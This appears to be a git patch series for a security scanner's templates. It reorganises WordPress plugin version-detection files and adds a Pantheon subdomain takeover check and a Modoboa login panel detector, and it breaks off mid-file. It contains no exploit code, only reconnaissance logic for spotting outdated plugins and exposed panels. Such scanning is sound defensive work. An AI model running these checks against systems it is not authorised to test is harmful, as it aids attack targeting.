helpers/wordpress/plugins/wp-super-cache.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-wp-user-avatar.yaml b/technologies/wordpress/plugins/wp-user-avatar.yaml similarity index 80% rename from technologies/wordpress/wordpress-wp-user-avatar.yaml rename to technologies/wordpress/plugins/wp-user-avatar.yaml index cb9b9248d6..3bfe1d3a54 100644 --- a/technologies/wordpress/wordpress-wp-user-avatar.yaml +++ b/technologies/wordpress/plugins/wp-user-avatar.yaml @@ -1,7 +1,7 @@ id: wordpress-wp-user-avatar info: - name: "Paid Membership, Ecommerce, User Registration, Login, User Profile & Restrict Content Plugin – ProfilePress Detection" + name: Paid Membership, Ecommerce, Registration Form, Login Form, User Profile, Paywall & Restrict Content – ProfilePress Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: wp-user-avatar wpscan: https://wpscan.com/plugin/wp-user-avatar - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/wp-user-avatar/readme.txt" payloads: - last_version: wordpress-wp-user-avatar.txt + last_version: helpers/wordpress/plugins/wp-user-avatar.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-wpcf7-recaptcha.yaml b/technologies/wordpress/plugins/wpcf7-recaptcha.yaml similarity index 86% rename from technologies/wordpress/wordpress-wpcf7-recaptcha.yaml rename to technologies/wordpress/plugins/wpcf7-recaptcha.yaml index 8be6e4fab9..72f67f704c 100644 --- a/technologies/wordpress/wordpress-wpcf7-recaptcha.yaml +++ b/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -1,7 +1,7 @@ id: wordpress-wpcf7-recaptcha info: - name: "ReCaptcha v2 for Contact Form 7 Detection" + name: ReCaptcha v2 for Contact Form 7 Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: wpcf7-recaptcha wpscan: https://wpscan.com/plugin/wpcf7-recaptcha - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/wpcf7-recaptcha/readme.txt" payloads: - last_version: wordpress-wpcf7-recaptcha.txt + last_version: helpers/wordpress/plugins/wpcf7-recaptcha.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-wpcf7-redirect.yaml b/technologies/wordpress/plugins/wpcf7-redirect.yaml similarity index 86% rename from technologies/wordpress/wordpress-wpcf7-redirect.yaml rename to technologies/wordpress/plugins/wpcf7-redirect.yaml index 4a9cef7306..ff8a6cfa26 100644 --- a/technologies/wordpress/wordpress-wpcf7-redirect.yaml +++ b/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -1,7 +1,7 @@ id: wordpress-wpcf7-redirect info: - name: "Redirection for Contact Form 7 Detection" + name: Redirection for Contact Form 7 Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: wpcf7-redirect wpscan: https://wpscan.com/plugin/wpcf7-redirect - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/wpcf7-redirect/readme.txt" payloads: - last_version: wordpress-wpcf7-redirect.txt + last_version: helpers/wordpress/plugins/wpcf7-redirect.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-wpforms-lite.yaml b/technologies/wordpress/plugins/wpforms-lite.yaml similarity index 83% rename from technologies/wordpress/wordpress-wpforms-lite.yaml rename to technologies/wordpress/plugins/wpforms-lite.yaml index dc1e6bc501..6bc8dd16a3 100644 --- a/technologies/wordpress/wordpress-wpforms-lite.yaml +++ b/technologies/wordpress/plugins/wpforms-lite.yaml @@ -1,7 +1,7 @@ id: wordpress-wpforms-lite info: - name: "Contact Form by WPForms – Drag & Drop Form Builder for WordPress Detection" + name: Contact Form by WPForms – Drag & Drop Form Builder for WordPress Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: wpforms-lite wpscan: https://wpscan.com/plugin/wpforms-lite - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/wpforms-lite/readme.txt" payloads: - last_version: wordpress-wpforms-lite.txt + last_version: helpers/wordpress/plugins/wpforms-lite.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-wps-hide-login.yaml b/technologies/wordpress/plugins/wps-hide-login.yaml similarity index 87% rename from technologies/wordpress/wordpress-wps-hide-login.yaml rename to technologies/wordpress/plugins/wps-hide-login.yaml index e433331f89..5a3b5d39a2 100644 --- a/technologies/wordpress/wordpress-wps-hide-login.yaml +++ b/technologies/wordpress/plugins/wps-hide-login.yaml @@ -1,7 +1,7 @@ id: wordpress-wps-hide-login info: - name: "WPS Hide Login Detection" + name: WPS Hide Login Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: wps-hide-login wpscan: https://wpscan.com/plugin/wps-hide-login - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/wps-hide-login/readme.txt" payloads: - last_version: wordpress-wps-hide-login.txt + last_version: helpers/wordpress/plugins/wps-hide-login.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-yith-woocommerce-compare.yaml b/technologies/wordpress/plugins/yith-woocommerce-compare.yaml similarity index 87% rename from technologies/wordpress/wordpress-yith-woocommerce-compare.yaml rename to technologies/wordpress/plugins/yith-woocommerce-compare.yaml index 8571468220..372581ccba 100644 --- a/technologies/wordpress/wordpress-yith-woocommerce-compare.yaml +++ b/technologies/wordpress/plugins/yith-woocommerce-compare.yaml @@ -1,7 +1,7 @@ id: wordpress-yith-woocommerce-compare info: - name: "YITH WooCommerce Compare Detection" + name: YITH WooCommerce Compare Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: yith-woocommerce-compare wpscan: https://wpscan.com/plugin/yith-woocommerce-compare - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/yith-woocommerce-compare/readme.txt" payloads: - last_version: wordpress-yith-woocommerce-compare.txt + last_version: helpers/wordpress/plugins/yith-woocommerce-compare.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-yith-woocommerce-wishlist.yaml b/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml similarity index 86% rename from technologies/wordpress/wordpress-yith-woocommerce-wishlist.yaml rename to technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 8f19192809..664a3ed7ad 100644 --- a/technologies/wordpress/wordpress-yith-woocommerce-wishlist.yaml +++ b/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -1,7 +1,7 @@ id: wordpress-yith-woocommerce-wishlist info: - name: "YITH WooCommerce Wishlist Detection" + name: YITH WooCommerce Wishlist Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: yith-woocommerce-wishlist wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/yith-woocommerce-wishlist/readme.txt" payloads: - last_version: wordpress-yith-woocommerce-wishlist.txt + last_version: helpers/wordpress/plugins/yith-woocommerce-wishlist.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-adminimize.txt b/technologies/wordpress/wordpress-adminimize.txt deleted file mode 100644 index cd97a5e32b..0000000000 --- a/technologies/wordpress/wordpress-adminimize.txt +++ /dev/null @@ -1 +0,0 @@ -1.11.8 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-advanced-custom-fields.txt b/technologies/wordpress/wordpress-advanced-custom-fields.txt deleted file mode 100644 index 81f0c273ca..0000000000 --- a/technologies/wordpress/wordpress-advanced-custom-fields.txt +++ /dev/null @@ -1 +0,0 @@ -6.0.5 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-all-in-one-seo-pack.txt b/technologies/wordpress/wordpress-all-in-one-seo-pack.txt deleted file mode 100644 index bfbcc84cec..0000000000 --- a/technologies/wordpress/wordpress-all-in-one-seo-pack.txt +++ /dev/null @@ -1 +0,0 @@ -4.2.7.1 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-all-in-one-wp-security-and-firewall.txt b/technologies/wordpress/wordpress-all-in-one-wp-security-and-firewall.txt deleted file mode 100644 index 3bff059174..0000000000 --- a/technologies/wordpress/wordpress-all-in-one-wp-security-and-firewall.txt +++ /dev/null @@ -1 +0,0 @@ -5.1.1 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-astra-sites.txt b/technologies/wordpress/wordpress-astra-sites.txt deleted file mode 100644 index 3ce1e64bb1..0000000000 --- a/technologies/wordpress/wordpress-astra-sites.txt +++ /dev/null @@ -1 +0,0 @@ -3.1.18 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-click-to-chat-for-whatsapp.txt b/technologies/wordpress/wordpress-click-to-chat-for-whatsapp.txt deleted file mode 100644 index 0caba26085..0000000000 --- a/technologies/wordpress/wordpress-click-to-chat-for-whatsapp.txt +++ /dev/null @@ -1 +0,0 @@ -3.17.1 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-coblocks.txt b/technologies/wordpress/wordpress-coblocks.txt deleted file mode 100644 index 98b6180181..0000000000 --- a/technologies/wordpress/wordpress-coblocks.txt +++ /dev/null @@ -1 +0,0 @@ -2.25.3 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-complianz-gdpr.txt b/technologies/wordpress/wordpress-complianz-gdpr.txt deleted file mode 100644 index 2319a69f28..0000000000 --- a/technologies/wordpress/wordpress-complianz-gdpr.txt +++ /dev/null @@ -1 +0,0 @@ -6.3.5 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-contact-form-7.txt b/technologies/wordpress/wordpress-contact-form-7.txt deleted file mode 100644 index 2a06a418a7..0000000000 --- a/technologies/wordpress/wordpress-contact-form-7.txt +++ /dev/null @@ -1 +0,0 @@ -5.6.4 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-creative-mail-by-constant-contact.txt b/technologies/wordpress/wordpress-creative-mail-by-constant-contact.txt deleted file mode 100644 index 49ebdd609c..0000000000 --- a/technologies/wordpress/wordpress-creative-mail-by-constant-contact.txt +++ /dev/null @@ -1 +0,0 @@ -1.6.5 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-custom-post-type-ui.txt b/technologies/wordpress/wordpress-custom-post-type-ui.txt deleted file mode 100644 index f0df1f7d54..0000000000 --- a/technologies/wordpress/wordpress-custom-post-type-ui.txt +++ /dev/null @@ -1 +0,0 @@ -1.13.2 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-disable-comments.txt b/technologies/wordpress/wordpress-disable-comments.txt deleted file mode 100644 index acdc3f1b0b..0000000000 --- a/technologies/wordpress/wordpress-disable-comments.txt +++ /dev/null @@ -1 +0,0 @@ -2.4.2 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-easy-fancybox.txt b/technologies/wordpress/wordpress-easy-fancybox.txt deleted file mode 100644 index 70b02ffc1b..0000000000 --- a/technologies/wordpress/wordpress-easy-fancybox.txt +++ /dev/null @@ -1 +0,0 @@ -1.9.4 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-elementor.txt b/technologies/wordpress/wordpress-elementor.txt deleted file mode 100644 index aaaff91926..0000000000 --- a/technologies/wordpress/wordpress-elementor.txt +++ /dev/null @@ -1 +0,0 @@ -3.8.1 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-elementskit-lite.txt b/technologies/wordpress/wordpress-elementskit-lite.txt deleted file mode 100644 index 460b6fd404..0000000000 --- a/technologies/wordpress/wordpress-elementskit-lite.txt +++ /dev/null @@ -1 +0,0 @@ -2.7.5 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-essential-addons-for-elementor-lite.txt b/technologies/wordpress/wordpress-essential-addons-for-elementor-lite.txt deleted file mode 100644 index c7ba1e87f7..0000000000 --- a/technologies/wordpress/wordpress-essential-addons-for-elementor-lite.txt +++ /dev/null @@ -1 +0,0 @@ -5.5.0 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-ewww-image-optimizer.txt b/technologies/wordpress/wordpress-ewww-image-optimizer.txt deleted file mode 100644 index 054306af06..0000000000 --- a/technologies/wordpress/wordpress-ewww-image-optimizer.txt +++ /dev/null @@ -1 +0,0 @@ -6.9.2 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-facebook-for-woocommerce.txt b/technologies/wordpress/wordpress-facebook-for-woocommerce.txt deleted file mode 100644 index 7da3c16870..0000000000 --- a/technologies/wordpress/wordpress-facebook-for-woocommerce.txt +++ /dev/null @@ -1 +0,0 @@ -3.0.5 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-formidable.txt b/technologies/wordpress/wordpress-formidable.txt deleted file mode 100644 index 0413736d69..0000000000 --- a/technologies/wordpress/wordpress-formidable.txt +++ /dev/null @@ -1 +0,0 @@ -5.5.4 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-google-analytics-dashboard-for-wp.txt b/technologies/wordpress/wordpress-google-analytics-dashboard-for-wp.txt deleted file mode 100644 index 202d1aaff4..0000000000 --- a/technologies/wordpress/wordpress-google-analytics-dashboard-for-wp.txt +++ /dev/null @@ -1 +0,0 @@ -7.10.1 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-google-analytics-for-wordpress.txt b/technologies/wordpress/wordpress-google-analytics-for-wordpress.txt deleted file mode 100644 index 2eb8a97206..0000000000 --- a/technologies/wordpress/wordpress-google-analytics-for-wordpress.txt +++ /dev/null @@ -1 +0,0 @@ -8.10.1 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-google-listings-and-ads.txt b/technologies/wordpress/wordpress-google-listings-and-ads.txt deleted file mode 100644 index a6254504e4..0000000000 --- a/technologies/wordpress/wordpress-google-listings-and-ads.txt +++ /dev/null @@ -1 +0,0 @@ -2.3.1 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-gutenberg.txt b/technologies/wordpress/wordpress-gutenberg.txt deleted file mode 100644 index 9b87fcc4a4..0000000000 --- a/technologies/wordpress/wordpress-gutenberg.txt +++ /dev/null @@ -1 +0,0 @@ -14.6.1 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-header-footer-code-manager.txt b/technologies/wordpress/wordpress-header-footer-code-manager.txt deleted file mode 100644 index 321b7ce4c0..0000000000 --- a/technologies/wordpress/wordpress-header-footer-code-manager.txt +++ /dev/null @@ -1 +0,0 @@ -1.1.30 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-imagify.txt b/technologies/wordpress/wordpress-imagify.txt deleted file mode 100644 index 415b19fc36..0000000000 --- a/technologies/wordpress/wordpress-imagify.txt +++ /dev/null @@ -1 +0,0 @@ -2.0 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-insert-headers-and-footers.txt b/technologies/wordpress/wordpress-insert-headers-and-footers.txt deleted file mode 100644 index 869a1de424..0000000000 --- a/technologies/wordpress/wordpress-insert-headers-and-footers.txt +++ /dev/null @@ -1 +0,0 @@ -2.0.4.4 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-jetpack.txt b/technologies/wordpress/wordpress-jetpack.txt deleted file mode 100644 index 801a96cb78..0000000000 --- a/technologies/wordpress/wordpress-jetpack.txt +++ /dev/null @@ -1 +0,0 @@ -11.5.1 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-limit-login-attempts-reloaded.txt b/technologies/wordpress/wordpress-limit-login-attempts-reloaded.txt deleted file mode 100644 index dea5277965..0000000000 --- a/technologies/wordpress/wordpress-limit-login-attempts-reloaded.txt +++ /dev/null @@ -1 +0,0 @@ -2.25.9 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-litespeed-cache.txt b/technologies/wordpress/wordpress-litespeed-cache.txt deleted file mode 100644 index 11aa145248..0000000000 --- a/technologies/wordpress/wordpress-litespeed-cache.txt +++ /dev/null @@ -1 +0,0 @@ -5.3 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-mailpoet.txt b/technologies/wordpress/wordpress-mailpoet.txt deleted file mode 100644 index 99eba4de93..0000000000 --- a/technologies/wordpress/wordpress-mailpoet.txt +++ /dev/null @@ -1 +0,0 @@ -4.1.0 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-mainwp-child.txt b/technologies/wordpress/wordpress-mainwp-child.txt deleted file mode 100644 index fbdd614c23..0000000000 --- a/technologies/wordpress/wordpress-mainwp-child.txt +++ /dev/null @@ -1 +0,0 @@ -4.3.0.1 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-meta-box.txt b/technologies/wordpress/wordpress-meta-box.txt deleted file mode 100644 index 92989cf398..0000000000 --- a/technologies/wordpress/wordpress-meta-box.txt +++ /dev/null @@ -1 +0,0 @@ -5.6.11 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-newsletter.txt b/technologies/wordpress/wordpress-newsletter.txt deleted file mode 100644 index 7086d6329b..0000000000 --- a/technologies/wordpress/wordpress-newsletter.txt +++ /dev/null @@ -1 +0,0 @@ -7.5.6 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-post-duplicator.txt b/technologies/wordpress/wordpress-post-duplicator.txt deleted file mode 100644 index caafb14889..0000000000 --- a/technologies/wordpress/wordpress-post-duplicator.txt +++ /dev/null @@ -1 +0,0 @@ -2.28 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-post-duplicator.yaml b/technologies/wordpress/wordpress-post-duplicator.yaml deleted file mode 100644 index 0a86d3cb23..0000000000 --- a/technologies/wordpress/wordpress-post-duplicator.yaml +++ /dev/null @@ -1,50 +0,0 @@ -id: wordpress-post-duplicator - -info: - name: "Post Duplicator Detection" - author: ricardomaia - severity: info - reference: - - https://wordpress.org/plugins/post-duplicator/ - metadata: - plugin_namespace: post-duplicator - wpscan: https://wpscan.com/plugin/post-duplicator - tags: tech,wordpress,plugin,top-200 - -requests: - - method: GET - redirects: true - max-redirects: 2 - path: - - "{{BaseURL}}/wp-content/plugins/post-duplicator/readme.txt" - - payloads: - last_version: wordpress-post-duplicator.txt - - extractors: - - type: regex - part: body - internal: true - name: internal_detected_version - group: 1 - regex: - - '(?i)Stable.tag:\s?([\w.]+)' - - - type: regex - part: body - name: detected_version - group: 1 - regex: - - '(?i)Stable.tag:\s?([\w.]+)' - - matchers-condition: or - matchers: - - type: dsl - name: "outdated_version" - dsl: - - compare_versions(internal_detected_version, concat("< ", last_version)) - - - type: regex - part: body - regex: - - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-post-smtp.txt b/technologies/wordpress/wordpress-post-smtp.txt deleted file mode 100644 index 41bb57bd66..0000000000 --- a/technologies/wordpress/wordpress-post-smtp.txt +++ /dev/null @@ -1 +0,0 @@ -2.1.10 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-premium-addons-for-elementor.txt b/technologies/wordpress/wordpress-premium-addons-for-elementor.txt deleted file mode 100644 index a619b06993..0000000000 --- a/technologies/wordpress/wordpress-premium-addons-for-elementor.txt +++ /dev/null @@ -1 +0,0 @@ -4.9.40 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-pretty-link.txt b/technologies/wordpress/wordpress-pretty-link.txt deleted file mode 100644 index 6a3913b049..0000000000 --- a/technologies/wordpress/wordpress-pretty-link.txt +++ /dev/null @@ -1 +0,0 @@ -3.2.7 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-redirection.txt b/technologies/wordpress/wordpress-redirection.txt deleted file mode 100644 index 229793ae14..0000000000 --- a/technologies/wordpress/wordpress-redirection.txt +++ /dev/null @@ -1 +0,0 @@ -5.3.5 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-siteorigin-panels.txt b/technologies/wordpress/wordpress-siteorigin-panels.txt deleted file mode 100644 index a4cc673ab3..0000000000 --- a/technologies/wordpress/wordpress-siteorigin-panels.txt +++ /dev/null @@ -1 +0,0 @@ -2.20.0 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-so-widgets-bundle.txt b/technologies/wordpress/wordpress-so-widgets-bundle.txt deleted file mode 100644 index 3b76afcacc..0000000000 --- a/technologies/wordpress/wordpress-so-widgets-bundle.txt +++ /dev/null @@ -1 +0,0 @@ -1.44.2 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-sucuri-scanner.txt b/technologies/wordpress/wordpress-sucuri-scanner.txt deleted file mode 100644 index ab63198823..0000000000 --- a/technologies/wordpress/wordpress-sucuri-scanner.txt +++ /dev/null @@ -1 +0,0 @@ -1.8.35 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-svg-support.txt b/technologies/wordpress/wordpress-svg-support.txt deleted file mode 100644 index d21aa93ccd..0000000000 --- a/technologies/wordpress/wordpress-svg-support.txt +++ /dev/null @@ -1 +0,0 @@ -2.5.4 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-table-of-contents-plus.txt b/technologies/wordpress/wordpress-table-of-contents-plus.txt deleted file mode 100644 index de4f119c79..0000000000 --- a/technologies/wordpress/wordpress-table-of-contents-plus.txt +++ /dev/null @@ -1 +0,0 @@ -2106 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-the-events-calendar.txt b/technologies/wordpress/wordpress-the-events-calendar.txt deleted file mode 100644 index 81f0c273ca..0000000000 --- a/technologies/wordpress/wordpress-the-events-calendar.txt +++ /dev/null @@ -1 +0,0 @@ -6.0.5 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-translatepress-multilingual.txt b/technologies/wordpress/wordpress-translatepress-multilingual.txt deleted file mode 100644 index acdc3f1b0b..0000000000 --- a/technologies/wordpress/wordpress-translatepress-multilingual.txt +++ /dev/null @@ -1 +0,0 @@ -2.4.2 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-ultimate-addons-for-gutenberg.txt b/technologies/wordpress/wordpress-ultimate-addons-for-gutenberg.txt deleted file mode 100644 index d845ccb115..0000000000 --- a/technologies/wordpress/wordpress-ultimate-addons-for-gutenberg.txt +++ /dev/null @@ -1 +0,0 @@ -2.0.16 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-updraftplus.txt b/technologies/wordpress/wordpress-updraftplus.txt deleted file mode 100644 index 454b87e9b1..0000000000 --- a/technologies/wordpress/wordpress-updraftplus.txt +++ /dev/null @@ -1 +0,0 @@ -1.22.23 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-user-role-editor.txt b/technologies/wordpress/wordpress-user-role-editor.txt deleted file mode 100644 index 6f94002d55..0000000000 --- a/technologies/wordpress/wordpress-user-role-editor.txt +++ /dev/null @@ -1 +0,0 @@ -4.63.1 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-w3-total-cache.txt b/technologies/wordpress/wordpress-w3-total-cache.txt deleted file mode 100644 index b539adea59..0000000000 --- a/technologies/wordpress/wordpress-w3-total-cache.txt +++ /dev/null @@ -1 +0,0 @@ -2.2.7 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-woo-cart-abandonment-recovery.txt b/technologies/wordpress/wordpress-woo-cart-abandonment-recovery.txt deleted file mode 100644 index b830554134..0000000000 --- a/technologies/wordpress/wordpress-woo-cart-abandonment-recovery.txt +++ /dev/null @@ -1 +0,0 @@ -1.2.20 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-woo-checkout-field-editor-pro.txt b/technologies/wordpress/wordpress-woo-checkout-field-editor-pro.txt deleted file mode 100644 index afa2b3515e..0000000000 --- a/technologies/wordpress/wordpress-woo-checkout-field-editor-pro.txt +++ /dev/null @@ -1 +0,0 @@ -1.8.0 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-woocommerce-paypal-payments.txt b/technologies/wordpress/wordpress-woocommerce-paypal-payments.txt deleted file mode 100644 index 359a5b952d..0000000000 --- a/technologies/wordpress/wordpress-woocommerce-paypal-payments.txt +++ /dev/null @@ -1 +0,0 @@ -2.0.0 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-woocommerce-pdf-invoices-packing-slips.txt b/technologies/wordpress/wordpress-woocommerce-pdf-invoices-packing-slips.txt deleted file mode 100644 index 448ada3bda..0000000000 --- a/technologies/wordpress/wordpress-woocommerce-pdf-invoices-packing-slips.txt +++ /dev/null @@ -1 +0,0 @@ -3.2.5 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-woocommerce.txt b/technologies/wordpress/wordpress-woocommerce.txt deleted file mode 100644 index 3769235d3e..0000000000 --- a/technologies/wordpress/wordpress-woocommerce.txt +++ /dev/null @@ -1 +0,0 @@ -7.1.0 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-wordfence.txt b/technologies/wordpress/wordpress-wordfence.txt deleted file mode 100644 index 9fdf3baef9..0000000000 --- a/technologies/wordpress/wordpress-wordfence.txt +++ /dev/null @@ -1 +0,0 @@ -7.8.0 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-wordpress-seo.txt b/technologies/wordpress/wordpress-wordpress-seo.txt deleted file mode 100644 index d6237c2631..0000000000 --- a/technologies/wordpress/wordpress-wordpress-seo.txt +++ /dev/null @@ -1 +0,0 @@ -19.11 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-wp-fastest-cache.txt b/technologies/wordpress/wordpress-wp-fastest-cache.txt deleted file mode 100644 index 337a6a8f18..0000000000 --- a/technologies/wordpress/wordpress-wp-fastest-cache.txt +++ /dev/null @@ -1 +0,0 @@ -1.0.8 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-wp-file-manager.txt b/technologies/wordpress/wordpress-wp-file-manager.txt deleted file mode 100644 index c32f54ca04..0000000000 --- a/technologies/wordpress/wordpress-wp-file-manager.txt +++ /dev/null @@ -1 +0,0 @@ -7.1.6 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-wp-google-maps.txt b/technologies/wordpress/wordpress-wp-google-maps.txt deleted file mode 100644 index 5fb79fe47c..0000000000 --- a/technologies/wordpress/wordpress-wp-google-maps.txt +++ /dev/null @@ -1 +0,0 @@ -9.0.13 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-wp-mail-smtp.txt b/technologies/wordpress/wordpress-wp-mail-smtp.txt deleted file mode 100644 index d1428a7e96..0000000000 --- a/technologies/wordpress/wordpress-wp-mail-smtp.txt +++ /dev/null @@ -1 +0,0 @@ -3.6.1 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-wp-maintenance-mode.txt b/technologies/wordpress/wordpress-wp-maintenance-mode.txt deleted file mode 100644 index b8d12d7371..0000000000 --- a/technologies/wordpress/wordpress-wp-maintenance-mode.txt +++ /dev/null @@ -1 +0,0 @@ -2.6.1 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-wp-optimize.txt b/technologies/wordpress/wordpress-wp-optimize.txt deleted file mode 100644 index df4bdc7e53..0000000000 --- a/technologies/wordpress/wordpress-wp-optimize.txt +++ /dev/null @@ -1 +0,0 @@ -3.2.9 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-wp-super-cache.txt b/technologies/wordpress/wordpress-wp-super-cache.txt deleted file mode 100644 index ee672d89ab..0000000000 --- a/technologies/wordpress/wordpress-wp-super-cache.txt +++ /dev/null @@ -1 +0,0 @@ -1.9.1 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-wp-user-avatar.txt b/technologies/wordpress/wordpress-wp-user-avatar.txt deleted file mode 100644 index 7e961f9e14..0000000000 --- a/technologies/wordpress/wordpress-wp-user-avatar.txt +++ /dev/null @@ -1 +0,0 @@ -4.3.2 \ No newline at end of file From 71f7c3e5fadb7972f5a41914e8a19a537562951a Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Sat, 17 Dec 2022 04:34:10 +0530 Subject: [PATCH 0499/1133] more validation to avoid false positive (#6383) --- takeovers/pantheon-takeover.yaml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/takeovers/pantheon-takeover.yaml b/takeovers/pantheon-takeover.yaml index 41dfc588e4..b752ac818f 100644 --- a/takeovers/pantheon-takeover.yaml +++ b/takeovers/pantheon-takeover.yaml @@ -23,3 +23,7 @@ requests: - type: word words: - "The gods are wise, but do not know of the site which you seek." + + - type: dsl + dsl: + - '!contains(host,"apigee.io")' \ No newline at end of file From 425a2fbcbbbfa7c2268ec23d4b7bf02e645a0c8e Mon Sep 17 00:00:00 2001 From: kh4sh3i Date: Sat, 17 Dec 2022 23:18:18 +0330 Subject: [PATCH 0500/1133] modoboa-panel --- exposed-panels/modoboa-panel.yaml | 38 +++++++++++++++++++++++++++++++ 1 file changed, 38 insertions(+) create mode 100644 exposed-panels/modoboa-panel.yaml diff --git a/exposed-panels/modoboa-panel.yaml b/exposed-panels/modoboa-panel.yaml new file mode 100644 index 0000000000..e6bead500a --- /dev/null +++ b/exposed-panels/modoboa-panel.yaml @@ -0,0 +1,38 @@ +id: modoboa-panel + +info: + name: Modoboa Login Panel - Detect + author: kh4sh3i + severity: info + description: | + Modoboa login panel was detected. + reference: + - https://modoboa.org + - https://github.com/modoboa/modoboa + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 + metadata: + verified: true + shodan-query: http.favicon.hash:1949005079 + tags: panel,modoboa,mail + +requests: + - method: GET + path: + - "{{BaseURL}}" + - 